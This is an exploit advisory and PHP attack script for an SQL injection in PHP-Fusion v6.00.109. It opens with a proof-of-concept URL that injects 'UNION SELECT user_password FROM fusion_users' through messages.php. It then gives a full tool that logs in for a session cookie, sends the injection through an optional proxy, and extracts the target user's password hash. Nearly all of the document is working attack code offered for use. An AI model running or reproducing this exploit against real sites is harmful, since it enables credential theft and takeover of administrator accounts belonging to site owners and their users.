PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure site: http://www.php-fusion.co.uk - if magic_quotes off -> SQL Injection, poc: http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/* now hash is showed in "To:" field when you post a private message this is the tool: *** PHP-Fusion v6.00.109 SQL Injection ***

Php-Fusion v6. 00.109 SQL Injection / admin|user credentials disclosure

a script by rgod at http://rgod.altervista.org

hostname ( ex: www.sitename.com )

path (ex: /phpfusion/ or just /)

specify a port other than 80 (default value)

your username

your password ( to get a valid session cookie)

user whom you want the password

send exploit trough an HTTP proxy

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket() { global $proxy, $host, $port, $html, $packet; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,2048); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>'')) { if ($port=='') {$port=80;} #STEP 1 -> login, to retrieve a session cookie... $data="user_name=".urlencode(trim($user))."&user_pass=".urlencode(trim($pass))."&login=Login"; if ($proxy=='') {$packet="POST ".$path."news.php HTTP/1.1\r\n";} else {$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.$path."/news.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); $cookie=$temp2[0]; echo '
Your cookie: '.htmlentities($cookie); # STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database $username=str_replace("'","",$username); $sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*"; if ($proxy=='') {$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";} else {$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";} $packet.="User-Agent: GameBoy, Powered by Nintendo\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: Keep-Alive, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n"; show($packet); sendpacket($packet); if (eregi('For Members only',$html)) {echo 'You have to specify a valid session cookie...'; die; } $temp=explode("'Click to view the senders profile'>",$html); $temp2=explode("",$temp[1]); $hash=$temp2[0]; echo '
Username: '.htmlentities($username).' Password hash: '.$hash; } else { echo '
Fill requested fields, optionally specify a proxy...';} ?> rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it